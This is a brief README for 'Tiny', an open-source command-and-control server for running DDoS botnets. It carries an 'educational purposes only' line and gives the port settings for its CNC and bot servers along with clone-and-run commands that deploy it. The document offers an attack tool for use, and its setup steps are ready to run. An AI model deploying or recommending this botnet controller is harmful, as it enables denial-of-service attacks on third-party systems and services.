Tiny is an open-source command-and-control (C&C) server designed for managing DDoS attacks.
This project is for educational purposes only.
In the run.py
file, you can customize the ports used by the CNC and BOT servers:
CNCServer('0.0.0.0', 5555).run()
BOTServer('0.0.0.0', 5556).run()
git clone https://github.com/domin11c/tiny-cnc.git
cd tiny-cnc
python3 run.py